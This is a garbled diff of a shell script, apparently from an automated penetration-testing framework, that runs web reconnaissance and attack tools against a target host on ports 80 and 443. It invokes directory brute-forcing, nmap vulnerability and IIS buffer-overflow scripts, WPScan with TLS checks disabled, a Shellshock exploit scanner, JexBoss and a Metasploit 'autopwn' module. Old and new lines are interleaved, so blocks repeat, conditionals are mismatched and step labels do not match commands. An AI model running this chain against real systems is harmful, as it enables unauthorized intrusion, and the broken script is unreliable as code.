if [ "$PASSIVE_SPIDER" == "1" ]; then
if [ "$SLACK_NOTIFICATIONS" == "1" ]; then
/usr/bin/python "$INSTALL_DIR/bin/slack.py" "Running web mode scan: $TARGET $MODE `date +"%Y-%m-%d %H:%M"`"
fi
if [ "$PASSIVE_SPIDER" == "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING PASSIVE WEB SPIDER $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
curl -sX GET "http://index.commoncrawl.org/CC-MAIN-2018-22-index?url=*.$TARGET&output=json" | jq -r .url | tee $LOOT_DIR/web/passivespider-$TARGET.txt 2> /dev/null
fi
if [ "$WAYBACKMACHINE" == "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED FETCHING WAYBACK MACHINE URLS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
curl -sX GET "http://web.archive.org/cdx/search/cdx?url=*.$TARGET/*&output=text&fl=original&collapse=urlkey" | tee $LOOT_DIR/web/waybackurls-$TARGET.txt 2> /dev/null
fi
if [ "$BLACKWIDOW" == "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING ACTIVE WEB SPIDER & APPLICATION SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
blackwidow -u http://$TARGET:80 -l 3 -s y -v n
cat /usr/share/blackwidow/$TARGET*/$TARGET*.txt 2> /dev/null > $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
cat $LOOT_DIR/web/waybackurls-$TARGET.txt 2> /dev/null >> $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
cat $LOOT_DIR/web/weblinks-http-$TARGET.txt 2> /dev/null >> $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
cat $LOOT_DIR/web/passivespider-$TARGET.txt 2> /dev/null >> $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
fi
if [ "$WEB_BRUTE_COMMONSCAN" == "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING PASSIVE WEB SPIDER $RESET"
echo -e "$OKRED RUNNING COMMON FILE/DIRECTORY BRUTE FORCE $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
curl -sX GET "http://index.commoncrawl.org/CC-MAIN-2018-22-index?url=*.$TARGET&output=json" | jq -r .url | tee $LOOT_DIR/web/passivespider-$TARGET.txt 2> /dev/null
fi
if [ "$WAYBACKMACHINE" == "1" ]; then
if [ "$DIRSEARCH" == "1" ]; then
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u http://$TARGET -w $WEB_BRUTE_STEALTH -x 400,403,404,405,406,429,502,503,504 -F -e $WEB_BRUTE_EXTENSIONS -f -r -t $THREADS --random-agents
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u http://$TARGET -w $WEB_BRUTE_COMMON -x 400,403,404,405,406,429,502,503,504 -F -e * -t $THREADS --random-agents
fi
if [ "$GOBUSTER" == "1" ]; then
gobuster -u http://$TARGET -w $WEB_BRUTE_COMMON -e | tee $LOOT_DIR/web/webbrute-$TARGET-http-common.txt
fi
fi
if [ "$WEB_BRUTE_FULLSCAN" == "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED FETCHING WAYBACK MACHINE URLS $RESET"
echo -e "$OKRED RUNNING FULL FILE/DIRECTORY BRUTE FORCE $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
curl -sX GET "http://web.archive.org/cdx/search/cdx?url=*.$TARGET/*&output=text&fl=original&collapse=urlkey" | tee $LOOT_DIR/web/waybackurls-$TARGET.txt 2> /dev/null
fi
if [ "$BLACKWIDOW" == "1" ]; then
if [ "$DIRSEARCH" == "1" ]; then
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u http://$TARGET -w $WEB_BRUTE_FULL -x 400,403,404,405,406,429,502,503,504 -F -e * -t $THREADS --random-agents
fi
if [ "$GOBUSTER" == "1" ]; then
gobuster -u http://$TARGET -w $WEB_BRUTE_FULL -e | tee $LOOT_DIR/web/webbrute-$TARGET-http-full.txt
fi
fi
if [ "$WEB_BRUTE_EXPLOITSCAN" == "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING ACTIVE WEB SPIDER & APPLICATION SCAN $RESET"
echo -e "$OKRED RUNNING FILE/DIRECTORY BRUTE FORCE FOR VULNERABILITIES $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
blackwidow -u http://$TARGET:80 -l 3 -s y -v n
cat /usr/share/blackwidow/$TARGET*/* 2> /dev/null > $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
cat $LOOT_DIR/web/waybackurls-$TARGET.txt 2> /dev/null >> $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
cat $LOOT_DIR/web/weblinks-http-$TARGET.txt 2> /dev/null >> $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
cat $LOOT_DIR/web/passivespider-$TARGET.txt 2> /dev/null >> $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
fi
if [ "$WEB_BRUTE_COMMONSCAN" == "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING COMMON FILE/DIRECTORY BRUTE FORCE $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u http://$TARGET -w $WEB_BRUTE_COMMON -x 400,403,404,405,406,429,502,503,504 -F -e php,asp,aspx,jsp,pl,cgi,js,css,txt,html,htm
fi
if [ "$WEB_BRUTE_FULLSCAN" == "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING FULL FILE/DIRECTORY BRUTE FORCE $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u http://$TARGET -w $WEB_BRUTE_FULL -x 400,403,404,405,406,429,502,503,504 -F -e php,asp,aspx,jsp,pl,cgi,js,css,txt,html,htm
fi
if [ "$WEB_BRUTE_EXPLOITSCAN" == "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING FILE/DIRECTORY BRUTE FORCE FOR VULNERABILITIES $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u http://$TARGET -w $WEB_BRUTE_EXPLOITS -x 400,403,404,405,406,429,502,503,504 -F -e html
fi
cat $PLUGINS_DIR/dirsearch/reports/$TARGET/* 2> /dev/null
cat $PLUGINS_DIR/dirsearch/reports/$TARGET/* > $LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null
wget http://$TARGET/robots.txt -O $LOOT_DIR/web/robots-$TARGET-http.txt 2> /dev/null
if [ "$NMAP_SCRIPTS" == "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING NMAP HTTP SCRIPTS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
nmap -A -Pn -T5 -p 80 -sV --script=/usr/share/nmap/scripts/iis-buffer-overflow.nse --script=http-vuln* $TARGET | tee $LOOT_DIR/output/nmap-$TARGET-port80
sed -r "s/</\&lh\;/g" $LOOT_DIR/output/nmap-$TARGET-port80 2> /dev/null > $LOOT_DIR/output/nmap-$TARGET-port80.txt 2> /dev/null
rm -f $LOOT_DIR/output/nmap-$TARGET-port80 2> /dev/null
fi
if [ "$CLUSTERD" == "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED ENUMERATING WEB SOFTWARE $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
clusterd -i $TARGET 2> /dev/null | tee $LOOT_DIR/web/clusterd-$TARGET-http.txt
fi
if [ "$CMSMAP" == "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING CMSMAP $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
cmsmap http://$TARGET | tee $LOOT_DIR/web/cmsmap-$TARGET-httpa.txt
echo ""
cmsmap http://$TARGET/wordpress/ | tee $LOOT_DIR/web/cmsmap-$TARGET-httpb.txt
echo ""
fi
if [ "$WPSCAN" == "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING WORDPRESS VULNERABILITY SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
wpscan --url http://$TARGET --no-update --disable-tls-checks 2> /dev/null | tee $LOOT_DIR/web/wpscan-$TARGET-httpa.txt
echo ""
wpscan --url http://$TARGET/wordpress/ --no-update --disable-tls-checks 2> /dev/null | tee $LOOT_DIR/web/wpscan-$TARGET-httpb.txt
echo ""
fi
if [ "$NIKTO" = "1" ]; then
if [ "$DIRSEARCH" == "1" ]; then
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u http://$TARGET -w $WEB_BRUTE_EXPLOITS -x 400,403,404,405,406,429,502,503,504 -F -e * -t $THREADS --random-agents
fi
if [ "$GOBUSTER" == "1" ]; then
gobuster -u http://$TARGET -w $WEB_BRUTE_EXPLOITS -e | tee $LOOT_DIR/web/webbrute-$TARGET-https-exploits.txt
fi
fi
if [ "$DIRSEARCH" == "1" ]; then
cat $PLUGINS_DIR/dirsearch/reports/$TARGET/* 2> /dev/null
cat $PLUGINS_DIR/dirsearch/reports/$TARGET/* > $LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null
fi
if [ "$GOBUSTER" == "1" ]; then
sort -u $LOOT_DIR/web/webbrute-$TARGET-*.txt 2> /dev/null > $LOOT_DIR/web/webbrute-$TARGET.txt 2> /dev/null
fi
wget http://$TARGET/robots.txt -O $LOOT_DIR/web/robots-$TARGET-http.txt 2> /dev/null
if [ "$NMAP_SCRIPTS" == "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING WEB VULNERABILITY SCAN $RESET"
echo -e "$OKRED RUNNING NMAP HTTP SCRIPTS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
nikto -h http://$TARGET -output $LOOT_DIR/web/nikto-$TARGET-http.txt
fi
if [ "$SHOCKER" = "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING SHELLSHOCK EXPLOIT SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
python $PLUGINS_DIR/shocker/shocker.py -H $TARGET --cgilist $PLUGINS_DIR/shocker/shocker-cgi_list --port 80 | tee $LOOT_DIR/web/shocker-$TARGET-port80.txt
fi
if [ "$JEXBOSS" = "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING JEXBOSS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
cd /tmp/
python /usr/share/sniper/plugins/jexboss/jexboss.py -u http://$TARGET | tee $LOOT_DIR/web/jexboss-$TARGET-port80.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/web/jexboss-$TARGET-port80.raw > $LOOT_DIR/web/jexboss-$TARGET-port80.txt 2> /dev/null
rm -f $LOOT_DIR/web/jexboss-$TARGET-port80.raw 2> /dev/null
cd $INSTALL_DIR
fi
cd $INSTALL_DIR
if [ "$METASPLOIT_EXPLOIT" == "1" ]; then
PORT="80"
SSL="false"
source modes/web_autopwn.sh
fi
nmap -A -Pn -T5 -p 80 -sV --script=http-vuln* $TARGET | tee $LOOT_DIR/output/nmap-$TARGET-port80
sed -r "s/</\&lh\;/g" $LOOT_DIR/output/nmap-$TARGET-port80 2> /dev/null > $LOOT_DIR/output/nmap-$TARGET-port80.txt 2> /dev/null
rm -f $LOOT_DIR/output/nmap-$TARGET-port80 2> /dev/null
fi
if [ "$CLUSTERD" == "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED ENUMERATING WEB SOFTWARE $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
clusterd -i $TARGET 2> /dev/null | tee $LOOT_DIR/web/clusterd-$TARGET-http.txt
fi
if [ "$CMSMAP" == "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING CMSMAP $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
cmsmap http://$TARGET | tee $LOOT_DIR/web/cmsmap-$TARGET-httpa.txt
echo ""
cmsmap http://$TARGET/wordpress/ | tee $LOOT_DIR/web/cmsmap-$TARGET-httpb.txt
echo ""
fi
if [ "$WPSCAN" == "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING WORDPRESS VULNERABILITY SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
wpscan --url http://$TARGET --no-update --disable-tls-checks 2> /dev/null | tee $LOOT_DIR/web/wpscan-$TARGET-httpa.txt
echo ""
wpscan --url http://$TARGET/wordpress/ --no-update --disable-tls-checks 2> /dev/null | tee $LOOT_DIR/web/wpscan-$TARGET-httpb.txt
echo ""
fi
if [ "$NIKTO" == "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING WEB VULNERABILITY SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
nikto -h http://$TARGET -output $LOOT_DIR/web/nikto-$TARGET-http-port80.txt
sed -ir "s/</\&lh\;/g" $LOOT_DIR/web/nikto-$TARGET-http-port80.txt
fi
if [ "$SHOCKER" = "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING SHELLSHOCK EXPLOIT SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
python $PLUGINS_DIR/shocker/shocker.py -H $TARGET --cgilist $PLUGINS_DIR/shocker/shocker-cgi_list --port 80 | tee $LOOT_DIR/web/shocker-$TARGET-port80.txt
fi
if [ "$JEXBOSS" = "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING JEXBOSS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
cd /tmp/
python /usr/share/sniper/plugins/jexboss/jexboss.py -u http://$TARGET | tee $LOOT_DIR/web/jexboss-$TARGET-port80.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/web/jexboss-$TARGET-port80.raw > $LOOT_DIR/web/jexboss-$TARGET-port80.txt 2> /dev/null
rm -f $LOOT_DIR/web/jexboss-$TARGET-port80.raw 2> /dev/null
cd $INSTALL_DIR
fi
if [ "$SLACK_NOTIFICATIONS" == "1" ]; then
/usr/bin/python "$INSTALL_DIR/bin/slack.py" "Finished brute force: $TARGET $MODE `date +"%Y-%m-%d %H:%M"`"
fi
cd $INSTALL_DIR
if [ "$METASPLOIT_EXPLOIT" == "1" ]; then
PORT="80"
SSL="false"
source modes/web_autopwn.sh
fi
fi

View File

@ -1,114 +1,132 @@
if [ "$MODE" = "web" ]; then
if [ "$BURP_SCAN" == "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING BURPSUITE SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
if [ "$VERBOSE" == "1" ]; then
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE]$OKGREEN curl -X POST \"http://$BURP_HOST:$BURP_PORT/v0.1/scan\" -d \"{\"scope\":{\"include\":[{\"rule\":\"https://$TARGET:443\"}],\"type\":\"SimpleScope\"},\"urls\":[\"https://$TARGET:443\"]}\"$RESET"
fi
curl -s -X POST "http://$BURP_HOST:$BURP_PORT/v0.1/scan" -d "{\"scope\":{\"include\":[{\"rule\":\"https://$TARGET:443\"}],\"type\":\"SimpleScope\"},\"urls\":[\"https://$TARGET:443\"]}"
echo ""
fi
if [ "$PASSIVE_SPIDER" == "1" ]; then
if [ "$SLACK_NOTIFICATIONS" == "1" ]; then
/usr/bin/python "$INSTALL_DIR/bin/slack.py" "Running web mode scan: $TARGET $MODE `date +"%Y-%m-%d %H:%M"`"
fi
if [ "$PASSIVE_SPIDER" == "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING PASSIVE WEB SPIDER $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
curl -sX GET "http://index.commoncrawl.org/CC-MAIN-2018-22-index?url=*.$TARGET&output=json" | jq -r .url | tee $LOOT_DIR/web/passivespider-$TARGET.txt 2> /dev/null
fi
if [ "$WAYBACKMACHINE" == "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED FETCHING WAYBACK MACHINE URLS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
curl -sX GET "http://web.archive.org/cdx/search/cdx?url=*.$TARGET/*&output=text&fl=original&collapse=urlkey" | tee $LOOT_DIR/web/waybackurls-$TARGET.txt 2> /dev/null
fi
if [ "$BLACKWIDOW" == "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING ACTIVE WEB SPIDER & APPLICATION SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
blackwidow -u https://$TARGET:443 -l 3 -s y -v n
cat /usr/share/blackwidow/$TARGET*/$TARGET*.txt 2> /dev/null > $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
cat $LOOT_DIR/web/waybackurls-$TARGET.txt 2> /dev/null >> $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
cat $LOOT_DIR/web/weblinks-https-$TARGET.txt 2> /dev/null >> $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
cat $LOOT_DIR/web/passivespider-$TARGET.txt 2> /dev/null >> $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
fi
if [ "$WEB_BRUTE_COMMONSCAN" == "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING PASSIVE WEB SPIDER $RESET"
echo -e "$OKRED RUNNING COMMON FILE/DIRECTORY BRUTE FORCE $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
curl -sX GET "http://index.commoncrawl.org/CC-MAIN-2018-22-index?url=*.$TARGET&output=json" | jq -r .url | tee $LOOT_DIR/web/passivespider-$TARGET.txt 2> /dev/null
fi
if [ "$WAYBACKMACHINE" == "1" ]; then
if [ "$DIRSEARCH" == "1" ]; then
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u https://$TARGET -w $WEB_BRUTE_STEALTH -x 400,403,404,405,406,429,502,503,504 -F -e $WEB_BRUTE_EXTENSIONS -f -r -t $THREADS --random-agents
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u https://$TARGET -w $WEB_BRUTE_COMMON -x 400,403,404,405,406,429,502,503,504 -F -e * -t $THREADS --random-agents
fi
if [ "$GOBUSTER" == "1" ]; then
gobuster -u https://$TARGET -w $WEB_BRUTE_COMMON -e | tee $LOOT_DIR/web/gobuster-$TARGET-https-common.txt
fi
fi
if [ "$WEB_BRUTE_FULLSCAN" == "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED FETCHING WAYBACK MACHINE URLS $RESET"
echo -e "$OKRED RUNNING FULL FILE/DIRECTORY BRUTE FORCE $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
curl -sX GET "http://web.archive.org/cdx/search/cdx?url=*.$TARGET/*&output=text&fl=original&collapse=urlkey" | tee $LOOT_DIR/web/waybackurls-$TARGET.txt 2> /dev/null
fi
if [ "$BLACKWIDOW" == "1" ]; then
if [ "$DIRSEARCH" == "1" ]; then
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u https://$TARGET -w $WEB_BRUTE_FULL -x 400,403,404,405,406,429,502,503,504 -F -e * -t $THREADS --random-agents
fi
if [ "$GOBUSTER" == "1" ]; then
gobuster -u https://$TARGET -w $WEB_BRUTE_FULL -e | tee $LOOT_DIR/web/gobuster-$TARGET-https-full.txt
fi
fi
if [ "$WEB_BRUTE_EXPLOITSCAN" == "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING ACTIVE WEB SPIDER & APPLICATION SCAN $RESET"
echo -e "$OKRED RUNNING FILE/DIRECTORY BRUTE FORCE FOR VULNERABILITIES $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
blackwidow -u https://$TARGET:443 -l 3 -s y -v n
cat /usr/share/blackwidow/$TARGET*/* 2> /dev/null >> $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
cat $LOOT_DIR/web/waybackurls-$TARGET.txt 2> /dev/null >> $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
cat $LOOT_DIR/web/weblinks-https-$TARGET.txt 2> /dev/null >> $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
cat $LOOT_DIR/web/passivespider-$TARGET.txt 2> /dev/null >> $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
fi
if [ "$WEB_BRUTE_COMMONSCAN" == "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING COMMON FILE/DIRECTORY BRUTE FORCE $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u https://$TARGET -w $WEB_BRUTE_COMMON -x 400,403,404,405,406,429,502,503,504 -F -e php,asp,aspx,jsp,pl,cgi,js,css,txt,html,htm
fi
if [ "$WEB_BRUTE_FULLSCAN" == "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING FULL FILE/DIRECTORY BRUTE FORCE $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u https://$TARGET -w $WEB_BRUTE_FULL -x 400,403,404,405,406,429,502,503,504 -F -e php,asp,aspx,jsp,pl,cgi,js,css,txt,html,htm
fi
if [ "$WEB_BRUTE_EXPLOITSCAN" == "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING FILE/DIRECTORY BRUTE FORCE FOR VULNERABILITIES $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u https://$TARGET -w $WEB_BRUTE_EXPLOITS -x 400,403,404,405,406,429,502,503,504 -F -e html
fi
cat $PLUGINS_DIR/dirsearch/reports/$TARGET/* 2> /dev/null
cat $PLUGINS_DIR/dirsearch/reports/$TARGET/* > $LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null
wget https://$TARGET/robots.txt -O $LOOT_DIR/web/robots-$TARGET-https.txt 2> /dev/null
if [ "$NMAP_SCRIPTS" == "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING NMAP HTTP SCRIPTS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
nmap -A -sV -T5 -Pn -p 443 --script=/usr/share/nmap/scripts/iis-buffer-overflow.nse --script=http-vuln* $TARGET | tee $LOOT_DIR/output/nmap-$TARGET-port443
sed -r "s/</\&lh\;/g" $LOOT_DIR/output/nmap-$TARGET-port443 2> /dev/null > $LOOT_DIR/output/nmap-$TARGET-port443.txt 2> /dev/null
rm -f $LOOT_DIR/output/nmap-$TARGET-port443 2> /dev/null
fi
if [ "$CLUSTERD" == "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED ENUMERATING WEB SOFTWARE $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
clusterd --ssl -i $TARGET 2> /dev/null | tee $LOOT_DIR/web/clusterd-$TARGET-https.txt
fi
if [ "$CMSMAP" == "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING CMSMAP $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
cmsmap https://$TARGET | tee $LOOT_DIR/web/cmsmap-$TARGET-httpsa.txt
echo ""
cmsmap https://$TARGET/wordpress/ | tee $LOOT_DIR/web/cmsmap-$TARGET-httpsb.txt
echo ""
fi
if [ "$WPSCAN" == "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING WORDPRESS VULNERABILITY SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
wpscan --url https://$TARGET --no-update --disable-tls-checks 2> /dev/null | tee $LOOT_DIR/web/cmsmap-$TARGET-httpsa.txt
echo ""
wpscan --url https://$TARGET/wordpress/ --no-update --disable-tls-checks 2> /dev/null | tee $LOOT_DIR/web/cmsmap-$TARGET-httpsb.txt
fi
if [ "$NIKTO" = "1" ]; then
if [ "$DIRSEARCH" == "1" ]; then
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u https://$TARGET -w $WEB_BRUTE_EXPLOITS -x 400,403,404,405,406,429,502,503,504 -F -e * -t $THREADS --random-agents
fi
if [ "$GOBUSTER" == "1" ]; then
gobuster -u https://$TARGET -w $WEB_BRUTE_EXPLOITS -e | tee $LOOT_DIR/web/gobuster-$TARGET-https-exploits.txt
fi
fi
if [ "$DIRSEARCH" == "1" ]; then
cat $PLUGINS_DIR/dirsearch/reports/$TARGET/* 2> /dev/null
cat $PLUGINS_DIR/dirsearch/reports/$TARGET/* > $LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null
fi
if [ "$GOBUSTER" == "1" ]; then
sort -u $LOOT_DIR/web/webbrute-$TARGET-*.txt 2> /dev/null > $LOOT_DIR/web/webbrute-$TARGET.txt 2> /dev/null
fi
wget https://$TARGET/robots.txt -O $LOOT_DIR/web/robots-$TARGET-https.txt 2> /dev/null
if [ "$NMAP_SCRIPTS" == "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING NMAP HTTP SCRIPTS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
nmap -A -sV -T5 -Pn -p 443 --script=/usr/share/nmap/scripts/iis-buffer-overflow.nse --script=http-vuln* $TARGET | tee $LOOT_DIR/output/nmap-$TARGET-port443
sed -r "s/</\&lh\;/g" $LOOT_DIR/output/nmap-$TARGET-port443 2> /dev/null > $LOOT_DIR/output/nmap-$TARGET-port443.txt 2> /dev/null
rm -f $LOOT_DIR/output/nmap-$TARGET-port443 2> /dev/null
fi
if [ "$CLUSTERD" == "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING WEB VULNERABILITY SCAN $RESET"
echo -e "$OKRED ENUMERATING WEB SOFTWARE $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
nikto -h https://$TARGET -output $LOOT_DIR/web/nikto-$TARGET-https.txt
fi
if [ "$SHOCKER" = "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING SHELLSHOCK EXPLOIT SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
python $PLUGINS_DIR/shocker/shocker.py -H $TARGET --cgilist $PLUGINS_DIR/shocker/shocker-cgi_list --ssl --port 443 | tee $LOOT_DIR/web/shocker-$TARGET-port443.txt
fi
if [ "$JEXBOSS" = "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING JEXBOSS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
cd /tmp/
python /usr/share/sniper/plugins/jexboss/jexboss.py -u https://$TARGET | tee $LOOT_DIR/web/jexboss-$TARGET-port443.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/web/jexboss-$TARGET-port443.raw > $LOOT_DIR/web/jexboss-$TARGET-port443.txt 2> /dev/null
rm -f $LOOT_DIR/web/jexboss-$TARGET-port443.raw 2> /dev/null
cd $INSTALL_DIR
fi
cd $INSTALL_DIR
if [ "$METASPLOIT_EXPLOIT" == "1" ]; then
PORT="443"
SSL="true"
source modes/web_autopwn.sh
fi
clusterd --ssl -i $TARGET 2> /dev/null | tee $LOOT_DIR/web/clusterd-$TARGET-https.txt
fi
if [ "$CMSMAP" == "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING CMSMAP $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
cmsmap https://$TARGET | tee $LOOT_DIR/web/cmsmap-$TARGET-httpsa.txt
echo ""
cmsmap https://$TARGET/wordpress/ | tee $LOOT_DIR/web/cmsmap-$TARGET-httpsb.txt
echo ""
fi
if [ "$WPSCAN" == "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING WORDPRESS VULNERABILITY SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
wpscan --url https://$TARGET --no-update --disable-tls-checks 2> /dev/null | tee $LOOT_DIR/web/cmsmap-$TARGET-httpsa.txt
echo ""
wpscan --url https://$TARGET/wordpress/ --no-update --disable-tls-checks 2> /dev/null | tee $LOOT_DIR/web/cmsmap-$TARGET-httpsb.txt
fi
if [ "$NIKTO" == "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING WEB VULNERABILITY SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
nikto -h https://$TARGET -output $LOOT_DIR/web/nikto-$TARGET-http-port443.txt
sed -ir "s/</\&lh\;/g" $LOOT_DIR/web/nikto-$TARGET-http-port443.txt
fi
if [ "$SHOCKER" = "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING SHELLSHOCK EXPLOIT SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
